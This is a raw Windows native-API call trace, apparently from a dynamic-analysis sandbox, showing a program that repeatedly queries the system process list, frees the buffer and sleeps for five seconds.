NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0201.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0201.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0201.969] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0201.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0201.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0201.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0201.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0201.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0202.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0202.098] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0202.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0202.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0202.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0202.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0202.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0202.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0202.247] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0202.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0202.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0202.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0202.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0202.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0202.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0202.364] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0202.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0202.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0202.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0202.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0202.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0202.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0202.472] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0202.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0202.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0202.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0202.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0202.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0202.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0202.732] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0202.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0202.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0202.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0202.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0202.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0202.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0202.868] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0202.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0202.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0202.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0202.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0202.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0203.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0203.055] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0203.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0203.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0203.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0203.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0203.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0203.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0203.202] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0203.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0203.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0203.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0203.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0203.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0203.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0203.324] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0203.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0203.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0203.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0203.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0203.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0203.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0203.429] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0203.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0203.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0203.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0203.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0203.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0203.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0203.574] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0203.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0203.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0203.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0203.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0203.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0203.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0203.737] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0203.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0203.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0203.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0203.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0203.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0203.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0203.886] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0203.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0203.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0203.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0203.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0203.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0204.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0204.045] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0204.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0204.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0204.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0204.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0204.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0204.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0204.181] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0204.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0204.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0204.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0204.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0204.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0204.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0204.322] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0204.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0204.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0204.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0204.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0204.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0204.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0204.436] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0204.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0204.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0204.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0204.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0204.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0204.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0204.607] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0204.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0204.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0204.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0204.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0204.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0204.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0204.771] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0204.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0204.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0204.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0204.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0204.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0204.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0204.983] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0204.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, 